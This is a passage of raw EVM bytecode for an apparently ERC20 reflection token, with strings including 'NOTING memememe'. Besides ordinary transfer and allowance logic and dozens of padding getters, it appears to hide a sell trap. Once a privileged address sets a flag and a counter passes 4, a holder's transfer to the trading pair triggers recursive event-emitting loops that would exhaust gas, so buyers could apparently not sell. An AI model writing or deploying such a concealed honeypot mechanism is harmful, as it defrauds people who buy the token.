63095ea7b3146108185780630b68bd9e146108545780630e0978821461087e5761076c565b806302e1a12614610770578063045cecfb1461079a57806305680fad146107c45761076c565b3661076c57005b5f80fd5b34801561077b575f80fd5b50610784611c78565b6040516107919190614be6565b60405180910390f35b3480156107a5575f80fd5b506107ae611c8e565b6040516107bb9190614be6565b60405180910390f35b3480156107cf575f80fd5b506107d8611ca4565b6040516107e59190614be6565b60405180910390f35b3480156107f9575f80fd5b50610802611cba565b60405161080f9190614be6565b60405180910390f35b348015610823575f80fd5b5061083e60048036038101906108399190614c97565b611d4a565b60405161084b9190614cef565b60405180910390f35b34801561085f575f80fd5b50610868611d67565b6040516108759190614be6565b60405180910390f35b348015610889575f80fd5b50610892611da4565b60405161089f9190614be6565b60405180910390f35b3480156108b3575f80fd5b506108bc611dba565b6040516108c99190614be6565b60405180910390f35b3480156108dd575f80fd5b506108f860048036038101906108f39190614d32565b611dd0565b005b348015610905575f80fd5b5061090e611e34565b60405161091b9190614d6c565b60405180910390f35b34801561092f575f80fd5b50610938611e3d565b6040516109459190614be6565b60405180910390f35b348015610959575f80fd5b50610962611e53565b60405161096f9190614be6565b60405180910390f35b348015610983575f80fd5b5061098c611e69565b6040516109999190614d6c565b60405180910390f35b3480156109ad575f80fd5b506109b6611e7b565b6040516109c39190614be6565b60405180910390f35b3480156109d7575f80fd5b506109e0611e91565b6040516109ed9190614be6565b60405180910390f35b348015610a01575f80fd5b50610a0a611ea7565b604051610a179190614be6565b60405180910390f35b348015610a2b575f80fd5b50610a34611ebd565b604051610a419190614be6565b60405180910390f35b348015610a55575f80fd5b50610a5e611ed3565b604051610a6b9190614be6565b60405180910390f35b348015610a7f575f80fd5b50610a88611ee9565b604051610a959190614be6565b60405180910390f35b348015610aa9575f80fd5b50610ac46004803603810190610abf9190614d85565b611eff565b604051610ad19190614cef565b60405180910390f35b348015610ae5575f80fd5b50610aee611fd3565b604051610afb9190614be6565b60405180910390f35b348015610b0f575f80fd5b50610b18611fe9565b604051610b259190614be6565b60405180910390f35b348015610b39575f80fd5b50610b42611fff565b604051610b4f9190614be6565b60405180910390f35b348015610b63575f80fd5b50610b6c612015565b604051610b799190614be6565b60405180910390f35b348015610b8d575f80fd5b50610b9661202b565b604051610ba39190614be6565b60405180910390f35b348015610bb7575f80fd5b50610bc0612041565b604051610bcd9190614be6565b60405180910390f35b348015610be1575f80fd5b50610bea612057565b604051610bf79190614be6565b60405180910390f35b348015610c0b575f80fd5b50610c1461206d565b604051610c219190614be6565b60405180910390f35b348015610c35575f80fd5b50610c3e612083565b604051610c4b9190614be6565b60405180910390f35b348015610c5f575f80fd5b50610c7a6004803603810190610c759190614dd5565b612099565b604051610c879190614d6c565b60405180910390f35b348015610c9b575f80fd5b50610ca4612105565b604051610cb19190614be6565b60405180910390f35b348015610cc5575f80fd5b50610cce61211b565b604051610cdb9190614be6565b60405180910390f35b348015610cef575f80fd5b50610cf8612131565b604051610d059190614e1b565b60405180910390f35b348015610d19575f80fd5b50610d22612146565b604051610d2f9190614be6565b60405180910390f35b348015610d43575f80fd5b50610d4c61215c565b604051610d599190614be6565b60405180910390f35b348015610d6d575f80fd5b50610d76612172565b604051610d839190614be6565b60405180910390f35b348015610d97575f80fd5b50610da0612188565b604051610dad9190614be6565b60405180910390f35b348015610dc1575f80fd5b50610dca61219e565b604051610dd79190614be6565b60405180910390f35b348015610deb575f80fd5b50610df46121b4565b604051610e019190614be6565b60405180910390f35b348015610e15575f80fd5b50610e1e6121ca565b604051610e2b9190614be6565b60405180910390f35b348015610e3f575f80fd5b50610e486121e0565b604051610e559190614be6565b60405180910390f35b348015610e69575f80fd5b50610e726121f6565b604051610e7f9190614be6565b60405180910390f35b348015610e93575f80fd5b50610e9c61220c565b604051610ea99190614e43565b60405180910390f35b348015610ebd575f80fd5b50610ec6612230565b604051610ed39190614be6565b60405180910390f35b348015610ee7575f80fd5b50610f026004803603810190610efd9190614e5c565b612246565b005b348015610f0f575f80fd5b50610f2a6004803603810190610f259190614e5c565b61245d565b604051610f379190614cef565b60405180910390f35b348015610f4b575f80fd5b50610f546124af565b604051610f619190614be6565b60405180910390f35b348015610f75575f80fd5b50610f7e6124c5565b604051610f8b9190614be6565b60405180910390f35b348015610f9f575f80fd5b50610fa86124db565b604051610fb59190614d6c565b60405180910390f35b348015610fc9575f80fd5b50610fd26124e1565b604051610fdf9190614be6565b60405180910390f35b348015610ff3575f80fd5b50610ffc6124f7565b6040516110099190614be6565b60405180910390f35b34801561101d575f80fd5b5061102661250d565b6040516110339190614be6565b60405180910390f35b348015611047575f80fd5b50611050612523565b60405161105d9190614be6565b60405180910390f35b348015611071575f80fd5b5061107a612539565b6040516110879190614be6565b60405180910390f35b34801561109b575f80fd5b506110a461254f565b6040516110b19190614be6565b60405180910390f35b3480156110c5575f80fd5b506110ce612565565b6040516110db9190614be6565b60405180910390f35b3480156110ef575f80fd5b506110f861257b565b6040516111059190614be6565b60405180910390f35b348015611119575f80fd5b50611122612591565b60405161112f9190614be6565b60405180910390f35b348015611143575f80fd5b5061114c6125a7565b6040516111599190614be6565b60405180910390f35b34801561116d575f80fd5b506111766125bd565b6040516111839190614be6565b60405180910390f35b348015611197575f80fd5b506111b260048036038101906111ad9190614e5c565b6125d3565b6040516111bf9190614d6c565b60405180910390f35b3480156111d3575f80fd5b506111dc6126b6565b005b3480156111e9575f80fd5b506111f26126c9565b6040516111ff9190614be6565b60405180910390f35b348015611213575f80fd5b5061121c6126df565b6040516112299190614be6565b60405180910390f35b34801561123d575f80fd5b506112466126f5565b6040516112539190614be6565b60405180910390f35b348015611267575f80fd5b5061127061270b565b60405161127d9190614be6565b60405180910390f35b348015611291575f80fd5b5061129a612721565b6040516112a79190614be6565b60405180910390f35b3480156112bb575f80fd5b506112c4612737565b6040516112d19190614be6565b60405180910390f35b3480156112e5575f80fd5b506112ee61274d565b6040516112fb9190614be6565b60405180910390f35b34801561130f575f80fd5b50611318612763565b6040516113259190614be6565b60405180910390f35b348015611339575f80fd5b50611342612779565b60405161134f9190614be6565b60405180910390f35b348015611363575f80fd5b5061136c61278f565b6040516113799190614be6565b60405180910390f35b34801561138d575f80fd5b506113966127a5565b6040516113a39190614be6565b60405180910390f35b3480156113b7575f80fd5b506113c06127bb565b6040516113cd9190614be6565b60405180910390f35b3480156113e1575f80fd5b506113fc60048036038101906113f79190614e5c565b6127d1565b6040516114099190614cef565b60405180910390f35b34801561141d575f80fd5b50611426612823565b6040516114339190614be6565b60405180910390f35b348015611447575f80fd5b50611450612839565b60405161145d9190614e43565b60405180910390f35b348015611471575f80fd5b5061147a612860565b6040516114879190614be6565b60405180910390f35b34801561149b575f80fd5b506114a4612876565b6040516114b19190614be6565b60405180910390f35b3480156114c5575f80fd5b506114ce612906565b6040516114db9190614be6565b60405180910390f35b3480156114ef575f80fd5b506114f861291c565b6040516115059190614be6565b60405180910390f35b348015611519575f80fd5b50611522612932565b60405161152f9190614be6565b60405180910390f35b348015611543575f80fd5b5061154c612948565b6040516115599190614be6565b60405180910390f35b34801561156d575f80fd5b5061157661295e565b6040516115839190614be6565b60405180910390f35b348015611597575f80fd5b506115b260048036038101906115ad9190614c97565b612974565b6040516115bf9190614cef565b60405180910390f35b3480156115d3575f80fd5b506115dc612991565b6040516115e99190614be6565b60405180910390f35b3480156115fd575f80fd5b506116066129a7565b6040516116139190614be6565b60405180910390f35b348015611627575f80fd5b506116306129bd565b60405161163d9190614be6565b60405180910390f35b348015611651575f80fd5b5061165a6129d3565b6040516116679190614be6565b60405180910390f35b34801561167b575f80fd5b506116846129e9565b6040516116919190614be6565b60405180910390f35b3480156116a5575f80fd5b506116ae6129ff565b6040516116bb9190614be6565b60405180910390f35b3480156116cf575f80fd5b506116d8612a15565b6040516116e59190614be6565b60405180910390f35b3480156116f9575f80fd5b50611702612a2b565b60405161170f9190614be6565b60405180910390f35b348015611723575f80fd5b5061172c612a41565b6040516117399190614be6565b60405180910390f35b34801561174d575f80fd5b50611756612a57565b6040516117639190614be6565b60405180910390f35b348015611777575f80fd5b50611780612a6d565b60405161178d9190614be6565b60405180910390f35b3480156117a1575f80fd5b506117aa612a83565b6040516117b79190614be6565b60405180910390f35b3480156117cb575f80fd5b506117d4612a99565b6040516117e19190614be6565b60405180910390f35b3480156117f5575f80fd5b506117fe612aaf565b60405161180b9190614be6565b60405180910390f35b34801561181f575f80fd5b50611828612ac5565b6040516118359190614be6565b60405180910390f35b348015611849575f80fd5b50611852612adb565b60405161185f9190614be6565b60405180910390f35b348015611873575f80fd5b5061187c612af1565b6040516118899190614be6565b60405180910390f35b34801561189d575f80fd5b506118a6612b07565b6040516118b39190614be6565b60405180910390f35b3480156118c7575f80fd5b506118d0612b1d565b6040516118dd9190614be6565b60405180910390f35b3480156118f1575f80fd5b5061190c60048036038101906119079190614e87565b612b33565b6040516119199190614d6c565b60405180910390f35b34801561192d575f80fd5b50611936612bb5565b6040516119439190614be6565b60405180910390f35b348015611957575f80fd5b50611960612bcb565b60405161196d9190614be6565b60405180910390f35b348015611981575f80fd5b5061199c60048036038101906119979190614c97565b612be1565b6040516119a99190614cef565b60405180910390f35b3480156119bd575f80fd5b506119c6612cc6565b005b3480156119d3575f80fd5b506119dc612cd0565b6040516119e99190614be6565b60405180910390f35b3480156119fd575f80fd5b50611a06612ce6565b604051611a139190614be6565b60405180910390f35b348015611a27575f80fd5b50611a30612cfc565b604051611a3d9190614be6565b60405180910390f35b348015611a51575f80fd5b50611a5a612d12565b604051611a679190614be6565b60405180910390f35b348015611a7b575f80fd5b50611a966004803603810190611a919190614e5c565b612d28565b005b348015611aa3575f80fd5b50611aac612daa565b604051611ab99190614be6565b60405180910390f35b348015611acd575f80fd5b50611ad6612dc0565b604051611ae39190614be6565b60405180910390f35b348015611af7575f80fd5b50611b00612dd6565b604051611b0d9190614d6c565b60405180910390f35b348015611b21575f80fd5b50611b2a612ddc565b604051611b379190614be6565b60405180910390f35b348015611b4b575f80fd5b50611b54612df2565b604051611b619190614be6565b60405180910390f35b348015611b75575f80fd5b50611b7e612e08565b604051611b8b9190614be6565b60405180910390f35b348015611b9f575f80fd5b50611ba8612e1e565b604051611bb59190614be6565b60405180910390f35b348015611bc9575f80fd5b50611bd2612e34565b604051611bdf9190614be6565b60405180910390f35b348015611bf3575f80fd5b50611bfc612e4a565b604051611c099190614be6565b60405180910390f35b348015611c1d575f80fd5b50611c386004803603810190611c339190614c97565b612e60565b604051611c459190614cef565b60405180910390f35b348015611c59575f80fd5b50611c62612f0e565b604051611c6f9190614be6565b60405180910390f35b606061042061026052611c89612e4a565b905090565b606061042061026052611c9f6121b4565b905090565b606061042061026052611cb5611e3d565b905090565b6060600e8054611cc990614ef2565b80601f0160208091040260200160405190810160405280929190818152602001828054611cf590614ef2565b8015611d405780601f10611d1757610100808354040283529160200191611d40565b820191905f5260205f20905b815481529060010190602001808311611d2357829003601f168201915b5050505050905090565b5f611d5d611d56612f24565b8484612f2b565b6001905092915050565b60606040518060400160405280600d81526020017f4e4f54494e47206d656d656d6500000000000000000000000000000000000000815250905090565b606061042061026052611db5611d67565b905090565b606061042061026052611dcb6126f5565b905090565b611dd9336130ee565b611e18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e0f90614f92565b60405180910390fd5b805f60146101000a81548160ff02191690831515021790555050565b5f600d54905090565b606061042061026052611e4e612dc0565b905090565b606061042061026052611e64612591565b905090565b5f6a084595161401484a000000905090565b606061042061026052611e8c612daa565b905090565b606061042061026052611ea2612779565b905090565b606061042061026052611eb8611fff565b905090565b606061042061026052611ece6129bd565b905090565b606061042061026052611ee461250d565b905090565b606061042061026052611efa6124f7565b905090565b5f611f0b84848461314a565b611fc884611f17612f24565b611fc3856040518060600160405280602881526020016157ad6028913960085f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f611f7a612f24565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461358a9092919063ffffffff16565b612f2b565b600190509392505050565b606061042061026052611fe4612015565b905090565b606061042061026052611ffa61215c565b905090565b606061042061026052612010611ee9565b905090565b606061042061026052612026612932565b905090565b60606104206102605261203c61274d565b905090565b606061042061026052612052612188565b905090565b606061042061026052612068612a6d565b905090565b60606104206102605261207e61278f565b905090565b606061042061026052612094612adb565b905090565b5f600c548211156120df576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120d690615020565b60405180910390fd5b5f6120e86135de565b90506120fd818461360790919063ffffffff16565b915050919050565b60606104206102605261211661270b565b905090565b60606104206102605261212c612a57565b905090565b5f60105f9054906101000a900460ff16905090565b606061042061026052612157611da4565b905090565b60606104206102605261216d612df2565b905090565b6060610420610260526121836129a7565b905090565b606061042061026052612199612af1565b905090565b6060610420610260526121af61295e565b905090565b6060610420610260526121c561219e565b905090565b6060610420610260526121db612a83565b905090565b6060610420610260526121f1612cd0565b905090565b606061042061026052612207611ea7565b905090565b7f000000000000000000000000000000000000000000000000000000000000000081565b606061042061026052612241612763565b905090565b61224e61361c565b600a5f8273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16156122d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122cf90615088565b60405180910390fd5b5f60065f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205411156123a55761236360065f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054612099565b60075f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b6001600a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600b81908060018154018082558091505060019003905f5260205f20015f9091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f60095f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b6060610420610260526124c061257b565b905090565b6060610420610260526124d6611c8e565b905090565b60135481565b6060610420610260526124f2611ebd565b905090565b606061042061026052612508611fe9565b905090565b60606104206102605261251e6129ff565b905090565b606061042061026052612534612146565b905090565b60606104206102605261254a612172565b905090565b606061042061026052612560612ac5565b905090565b606061042061026052612576612083565b905090565b60606104206102605261258c6129e9565b905090565b6060610420610260526125a26126c9565b905090565b6060610420610260526125b8611e7b565b905090565b6060610420610260526125ce6121ca565b905090565b5f600a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16156126685760075f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490506126b1565b6126ae60065f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054612099565b90505b919050565b6126be61361c565b6126c75f61369a565b565b6060610420610260526126da61254f565b905090565b6060610420610260526126f061206d565b905090565b606061042061026052612706612e08565b905090565b60606104206102605261271c6121f6565b905090565b606061042061026052612732612737565b905090565b606061042061026052612748612a2b565b905090565b60606104206102605261275e612041565b905090565b606061042061026052612774612cfc565b905090565b60606104206102605261278a6124c5565b905090565b6060610420610260526127a0612539565b905090565b6060610420610260526127b6612823565b905090565b6060610420610260526127cc6127a5565b905090565b5f600a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b606061042061026052612834612d12565b905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606061042061026052612871612523565b905090565b6060600f805461288590614ef2565b80601f01602080910402602001604051908101604052809291908181526020018280546128b190614ef2565b80156128fc5780601f106128d3576101008083540402835291602001916128fc565b820191905f5260205f20905b8154815290600101906020018083116128df57829003601f168201915b5050505050905090565b6060610420610260526129176124af565b905090565b60606104206102605261292d612b1d565b905090565b6060610420610260526129436124e1565b905090565b606061042061026052612959612230565b905090565b60606104206102605261296f612ddc565b905090565b5f612987612980612f24565b848461314a565b6001905092915050565b6060610420610260526129a2612b07565b905090565b6060610420610260526129b8612105565b905090565b6060610420610260526129ce612bcb565b905090565b6060610420610260526129e4611c78565b905090565b6060610420610260526129fa61211b565b905090565b606061042061026052612a10612a15565b905090565b606061042061026052612a26611e91565b905090565b606061042061026052612a3c612057565b905090565b606061042061026052612a5261202b565b905090565b606061042061026052612a68612a99565b905090565b606061042061026052612a7e6127bb565b905090565b606061042061026052612a946121e0565b905090565b606061042061026052612aaa6125a7565b905090565b606061042061026052612ac0611ca4565b905090565b606061042061026052612ad6612860565b905090565b606061042061026052612aec611ed3565b905090565b606061042061026052612b026129d3565b905090565b606061042061026052612b18612ce6565b905090565b606061042061026052612b2e612f0e565b905090565b5f60085f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b606061042061026052612bc6611e53565b905090565b606061042061026052612bdc612e1e565b905090565b5f612cbc612bed612f24565b84612cb7856040518060400160405280601b81526020017f45524332303a204572726f72204c65737320416c6c6f77616e6365000000000081525060085f612c33612f24565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461358a9092919063ffffffff16565b612f2b565b6001905092915050565b612cce61375b565b565b606061042061026052612ce1611dba565b905090565b606061042061026052612cf761291c565b905090565b606061042061026052612d0d612721565b905090565b606061042061026052612d23612aaf565b905090565b612d3061361c565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603612d9e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d9590615116565b60405180910390fd5b612da78161369a565b50565b606061042061026052612dbb612e34565b905090565b606061042061026052612dd1612906565b905090565b60115481565b606061042061026052612ded6126df565b905090565b606061042061026052612e03612bb5565b905090565b606061042061026052612e19612991565b905090565b606061042061026052612e2f612948565b905090565b606061042061026052612e456125bd565b905090565b606061042061026052612e5b611fd3565b905090565b5f612f04612e6c612f24565b84612eff8560085f612e7c612f24565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461376590919063ffffffff16565b612f2b565b6001905092915050565b606061042061026052612f1f612565565b905090565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612f99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612f90906151a4565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603613007576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612ffe90615232565b60405180910390fd5b8060085f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516130e19190614d6c565b60405180910390a3505050565b5f60025f015f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16149050919050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036131b8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016131af906152c0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603613226576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161321d9061534e565b60405180910390fd5b5f8111613268576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161325f906153dc565b60405180910390fd5b613270612839565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141580156132de57506132ae612839565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b15613340575f60149054906101000a900460ff1661333f576132ff836130ee565b61333e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161333590614f92565b60405180910390fd5b5b5b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663e6a439053060045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166040518363ffffffff1660e01b81526004016133be9291906153fa565b602060405180830381865afa1580156133d9573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906133fd9190615435565b9050600460035f01541180156134c05750601560019054906101000a900460ff16801561343557505f1515613431856130ee565b1515145b80156134885750600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b80156134bf57508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b5b156134ce576134cd61377a565b5b5f6001905060095f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168061356e575060095f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15613577575f90505b613583858585846137e6565b5050505050565b5f8383111582906135d1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016135c89190614be6565b60405180910390fd5b5082840390509392505050565b5f805f6135e9613c04565b91509150613600818361360790919063ffffffff16565b9250505090565b5f818361361491906154ba565b905092915050565b613624612f24565b73ffffffffffffffffffffffffffffffffffffffff16613642612839565b73ffffffffffffffffffffffffffffffffffffffff1614613698576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161368f90615534565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b613763613ebd565b565b5f81836137729190615552565b905092915050565b5f6103e84261378991906156c1565b90505f5b818110156137e2577f2e5fe655679164eb7fc96b04a226584d5de4e52c586f9ab28eae3e1cda87f7c660016040516137c59190614cef565b60405180910390a16137d5613f38565b808060010191505061378d565b5050565b806137f4576137f3613fa3565b5b600a5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156138915750600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b156138a6576138a1848484613fdc565b613acb565b600a5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161580156139435750600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b1561395857613953848484614223565b613aca565b600a5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161580156139f65750600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15613a0b57613a0684848461446a565b613ac9565b600a5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015613aa75750600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15613abc57613ab7848484614620565b613ac8565b613ac784848461446a565b5b5b5b5b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663e6a439053060045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166040518363ffffffff1660e01b8152600401613b499291906153fa565b602060405180830381865afa158015613b64573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190613b889190615435565b90505f1515613b96866130ee565b1515148015613bd057508073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b15613bef57600160035f0154613be69190615552565b60035f01819055505b81613bfd57613bfc6148f8565b5b5050505050565b5f805f600c5490505f6a084595161401484a00000090505f5b600b80549050811015613e6e578260065f600b8481548110613c4257613c4161570b565b5b905f5260205f20015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20541180613d2757508160075f600b8481548110613cc357613cc261570b565b5b905f5260205f20015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054115b15613d4757600c546a084595161401484a00000094509450505050613eb9565b613dd260065f600b8481548110613d6157613d6061570b565b5b905f5260205f20015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20548461490c90919063ffffffff16565b9250613e5f60075f600b8481548110613dee57613ded61570b565b5b905f5260205f20015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20548361490c90919063ffffffff16565b91508080600101915050613c1d565b50613e8f6a084595161401484a000000600c5461360790919063ffffffff16565b821015613eb057600c546a084595161401484a000000935093505050613eb9565b81819350935050505b9091565b5f33905060025f015f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603613f35576001601560016101000a81548160ff0219169083151502179055505b50565b5f6103e842613f4791906156c1565b90505f5b81811015613f9f577f2e5fe655679164eb7fc96b04a226584d5de4e52c586f9ab28eae3e1cda87f7c65f604051613f829190614cef565b60405180910390a1613f9261377a565b8080600101915050613f4b565b5050565b5f601154148015613fb557505f601354145b613fda576011546012819055506013546014819055505f6011819055505f6013819055505b565b5f805f805f80613feb87614921565b9550955095509550955095506140478760075f8c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461490c90919063ffffffff16565b60075f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506140d88660065f8c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461490c90919063ffffffff16565b60065f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506141698560065f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461376590919063ffffffff16565b60065f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506141b381614976565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516142109190614d6c565b60405180910390a3505050505050505050565b5f805f805f8061423287614921565b95509550955095509550955061428e8660065f8c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461490c90919063ffffffff16565b60065f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555061431f8360075f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461376590919063ffffffff16565b60075f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506143b08560065f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461376590919063ffffffff16565b60065f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506143fa81614976565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516144579190614d6c565b60405180910390a3505050505050505050565b5f805f805f8061447987614921565b9550955095509550955095506144d58660065f8c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461490c90919063ffffffff16565b60065f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506145668560065f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffff